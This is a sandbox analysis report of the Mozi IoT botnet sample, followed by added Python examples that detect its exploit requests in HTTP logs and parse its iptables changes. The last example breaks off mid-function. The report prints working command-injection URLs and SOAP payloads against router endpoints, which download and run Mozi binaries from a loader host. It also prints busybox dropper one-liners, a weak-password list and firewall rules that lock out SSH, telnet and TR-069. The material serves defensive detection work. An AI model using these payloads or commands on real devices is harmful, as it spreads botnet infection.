              Source: mozi.a.zip | String found in binary or memory: http://%s:%d/bin.sh;chmod
              Source: mozi.a.zip | String found in binary or memory: http://127.0.0.1
              Source: mozi.a.zip | String found in binary or memory: http://127.0.0.1sendcmd
              Source: mozi.a.zip | String found in binary or memory: http://HTTP/1.1
              Source: mozi.a.zip | String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
              Source: .config.8.dr | String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
              Source: mozi.a.zip | String found in binary or memory: http://ipinfo.io/ip
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://pastebin.ca)
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
              Source: mozi.a.zip | String found in binary or memory: http://purenetworks.com/HNAP1/
              Source: mozi.a.zip | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: mozi.a.zip | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: mozi.a.zip | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://www.alsa-project.org
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://www.alsa-project.org.
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://www.pastebin.ca
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://www.pastebin.ca.
              Source: alsa-info.sh0.8.dr | String found in binary or memory: http://www.pastebin.ca/upload.php
              Source: /tmp/mozi.a.zip (PID: 4598) | HTML file containing JavaScript created: /usr/networks
              Source: Initial sample | String containing 'busybox' found: busybox
              Source: Initial sample | String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
              Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
              Source: Initial sample | String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
              Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|more
              Source: Initial sample | String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
              Source: Initial sample | String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial sample | String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
              Source: Initial sample | String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
              Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sample | String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
              Source: Initial sample | String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
              Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
              Source: Initial sample | String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
              Source: Initial sample | String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
              Source: Initial sample | String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
              Source: Initial sample | String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
              Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
              Source: Initial sample | String containing potential weak password found: admin
              Source: Initial sample | String containing potential weak password found: default
              Source: Initial sample | String containing potential weak password found: support
              Source: Initial sample | String containing potential weak password found: service
              Source: Initial sample | String containing potential weak password found: supervisor
              Source: Initial sample | String containing potential weak password found: guest
              Source: Initial sample | String containing potential weak password found: administrator
              Source: Initial sample | String containing potential weak password found: 123456
              Source: Initial sample | String containing potential weak password found: 54321
              Source: Initial sample | String containing potential weak password found: password
              Source: Initial sample | String containing potential weak password found: 12345
              Source: Initial sample | String containing potential weak password found: admin1234
              Source: Initial samplePotential command found: POST /cdn-cgi/
              Source: Initial samplePotential command found: GET /c HTTP/1.0
              Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
              Source: Initial samplePotential command found: GET %s HTTP/1.1
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
              Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
              Source: Initial samplePotential command found: mount -o remount,rw /overlay /
              Source: Initial samplePotential command found: mv -f %s %s
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: GET /c
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: killall -9 %s
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
              Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
              Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
              Source: Initial samplePotential command found: GET /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
              Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
              Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
              Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
              Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
              Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
              Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
              Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
              Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: mozi.a.zip, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: classification engineClassification label: mal100.spre.troj.evad.linZIP@0/221@4/0
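
              The request templates above are the sample's exploit-delivery paths: a vulnerable device endpoint plus a shell command, either URL-encoded in the query string (with `+` or `${IFS}` standing in for spaces) or wrapped in backticks / `$( )` inside a TR-064 or UPnP SOAP parameter, that fetches and runs a `Mozi.<arch>` stage from the loader at `%s:%d`. The following is an added example, not part of the sandbox report or of the Mozi code, showing how a detection engineer would match those templates in HTTP request logs and separate mere endpoint probes from actual injection attempts. The log records, the loader address 192.0.2.10:80 and all function names are constructed for the illustration.

```python
"""Match Mozi exploit-delivery requests in HTTP logs (added example)."""
import re
import urllib.parse
from typing import List, Tuple

# Endpoints taken from the request templates in the report. A hit here on its
# own is only a probe: /HNAP1/ or /picsdesc.xml are legitimate device URLs.
EXPLOIT_PATHS = (
    "/GponForm/diag_Form",
    "/setup.cgi?next_file=netgear.cfg",
    "/ctrlt/DeviceUpgrade_1",
    "/UD/act?1",
    "/HNAP1/",
    "/language/Swedish",
    "/shell?",
    "/soap.cgi?service=WANIPConn1",
    "/cgi-bin/;",
    "/board.cgi?cmd=",
    "/picsdesc.xml",
)

# A loader command (cd, rm, wget, chmod, sh, busybox) wedged between shell
# separators in the URL; ${IFS} is the whitespace substitute the templates
# use where a literal space would break the request line.
INJECTION_RE = re.compile(
    r"(?:[?;&|]|\$\{IFS\}|\s)(?:cd|rm|wget|chmod|sh|busybox)(?:\s|\$\{IFS\})")

# Any reference to a Mozi.<arch> stage (Mozi.a, Mozi.m, Mozi.7, ...).
MOZI_PAYLOAD_RE = re.compile(r"/Mozi\.[a-z0-9]\b")

# Backtick or $( ) command substitution inside the SOAP parameters the
# TR-064 SetNTPServers and Huawei UPnP Upgrade templates abuse.
SOAP_CMD_RE = re.compile(
    r"<(?:NewNTPServer\d|NewStatusURL|NewDownloadURL)>\s*(?:`|\$\()")


def classify_request(method: str, path: str, body: str = "") -> Tuple[str, List[str]]:
    """Return (verdict, reasons) with verdict 'clean', 'probe' or 'exploit'."""
    decoded = urllib.parse.unquote_plus(path)   # '+' -> ' ', %XX -> byte
    reasons: List[str] = []
    if any(p in decoded for p in EXPLOIT_PATHS):
        reasons.append("known Mozi exploit endpoint")
    if INJECTION_RE.search(decoded):
        reasons.append("shell command injected into URL")
    if MOZI_PAYLOAD_RE.search(decoded) or MOZI_PAYLOAD_RE.search(body):
        reasons.append("fetches a Mozi.<arch> payload")
    if method.upper() == "POST" and SOAP_CMD_RE.search(body):
        reasons.append("command substitution in SOAP parameter")
    if not reasons:
        return "clean", reasons
    if reasons == ["known Mozi exploit endpoint"]:
        return "probe", reasons
    return "exploit", reasons


# Constructed log records: the report's templates with the loader's %s:%d
# placeholder filled in with a documentation-range address.
LOADER = "192.0.2.10:80"
SAMPLE_REQUESTS = [
    ("GET", "/index.html", ""),
    ("POST", "/HNAP1/", "<soap:Envelope/>"),
    ("GET", "/shell?cd+/tmp;rm+-rf+*;wget+http://%s/Mozi.a;chmod+777+Mozi.a;"
            "/tmp/Mozi.a+jaws" % LOADER, ""),
    ("GET", "/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}"
            "http://%s/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js" % LOADER, ""),
    ("POST", "/UD/act?1", "<SOAP-ENV:Envelope><SOAP-ENV:Body><u:SetNTPServers>"
             "<NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s/Mozi.m"
             " && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1>"
             "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>" % LOADER),
    ("POST", "/ctrlt/DeviceUpgrade_1", "<s:Envelope><s:Body><u:Upgrade><NewStatusURL>"
             "$(/bin/busybox wget -g %s -l /tmp/huawei -r /Mozi.m;chmod -x huawei;"
             "/tmp/huawei huawei)</NewStatusURL></u:Upgrade></s:Body></s:Envelope>" % LOADER),
    ("GET", "/Mozi.a", ""),
]


def scan(records) -> List[Tuple[str, str, str, List[str]]]:
    """Classify (method, path, body) records into (method, path, verdict, reasons)."""
    out = []
    for method, path, body in records:
        verdict, reasons = classify_request(method, path, body)
        out.append((method, path, verdict, reasons))
    return out


if __name__ == "__main__":
    for method, path, verdict, reasons in scan(SAMPLE_REQUESTS):
        print("%-7s %-40.40s %s" % (verdict, path, ", ".join(reasons)))
```

              The decode step matters: web server logs usually store the raw request line, so `rm+-rf+*` only becomes `rm -rf *` after `unquote_plus`, while `${IFS}` survives decoding and has to be matched literally. A bare `POST /HNAP1/` is reported as a probe rather than an exploit because the injection for that endpoint lives in the body, which many access logs do not record.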

              Persistence and Installation Behavior:

              Executes the "iptables" command to insert, remove and/or manipulate rules
              Source: /bin/sh (PID: 4638) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
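
              Read together, the rules above are the sample's firewall footprint: it inserts ACCEPT rules for its own TCP port 60120 and UDP port 8987 (filter INPUT/OUTPUT plus nat PREROUTING/POSTROUTING) and DROP rules for inbound and outbound 7547 (TR-069 CWMP), 35000, 50023 and 58000, each rule issued twice with the long and short option spellings. Because `-I` without a rule number inserts at position 1 of the chain, the DROP rules take precedence over any ACCEPT the device already had. The added example below, written for this page and not code from the report or from the sample, parses such commands the way an incident responder would pull them from a shell history or process log and decides whether they fit the lock-out-management-and-open-own-port pattern. The command list is copied from this report; the MANAGEMENT_PORTS table and the function names are the example's own assumptions.

```python
"""Summarise the inbound effect of recorded iptables commands (added example)."""
import shlex
from typing import Dict, List, Set, Tuple

# Commands as recorded by the sandbox for this sample (a subset; each rule is
# issued twice, once with --destination-port/--source-port and once with
# --dport/--sport, and the nat table is hit through PREROUTING/POSTROUTING).
OBSERVED_COMMANDS = [
    "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT",
    "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT",
    "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT",
    "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT",
    "iptables -I INPUT -p tcp --destination-port 58000 -j DROP",
    "iptables -I INPUT -p tcp --dport 58000 -j DROP",
    "iptables -I INPUT -p tcp --destination-port 35000 -j DROP",
    "iptables -I INPUT -p tcp --destination-port 50023 -j DROP",
    "iptables -I INPUT -p tcp --destination-port 7547 -j DROP",
    "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP",
    "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT",
    "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT",
]

# Remote-management services an IoT bot locks out once it is in. Assumed
# table for the example: 22/23/2323 are SSH and telnet, 7547 is TR-069
# CWMP; 35000/50023/58000 from the sample are left unlabelled on purpose.
MANAGEMENT_PORTS = {22: "ssh", 23: "telnet", 2323: "telnet-alt", 7547: "tr-069"}

Rule = Tuple[str, str, str, str, int, str]  # table, chain, proto, direction, port, target


def parse_rule(cmd: str) -> Rule:
    """Normalise one 'iptables -I|-A ...' command; long and short option
    spellings map to the same tuple and the table defaults to 'filter'."""
    argv = shlex.split(cmd)
    if not argv or argv[0] != "iptables":
        raise ValueError("not an iptables command: %r" % cmd)
    table, chain, proto, direction, port, target = "filter", "", "", "", -1, ""
    i = 1
    while i < len(argv):
        opt = argv[i]
        val = argv[i + 1] if i + 1 < len(argv) else ""
        if opt in ("-I", "-A"):
            chain = val
            if i + 2 < len(argv) and argv[i + 2].isdigit():
                i += 1                      # '-I CHAIN 3' carries a position
        elif opt == "-t":
            table = val
        elif opt == "-p":
            proto = val
        elif opt in ("--dport", "--destination-port"):
            direction, port = "dst", int(val)
        elif opt in ("--sport", "--source-port"):
            direction, port = "src", int(val)
        elif opt == "-j":
            target = val
        else:
            i += 1                          # flag without an argument
            continue
        i += 2
    if not (chain and proto and direction and target) or port < 0:
        raise ValueError("unsupported rule shape: %r" % cmd)
    return table, chain, proto, direction, port, target


def assess(commands: List[str]) -> Dict[str, object]:
    """Which (proto, port) pairs end up accepted or dropped on the way in,
    and whether that matches the bot's lock-out pattern."""
    opened: Set[Tuple[str, int]] = set()
    blocked: Set[Tuple[str, int]] = set()
    for cmd in commands:
        table, chain, proto, direction, port, target = parse_rule(cmd)
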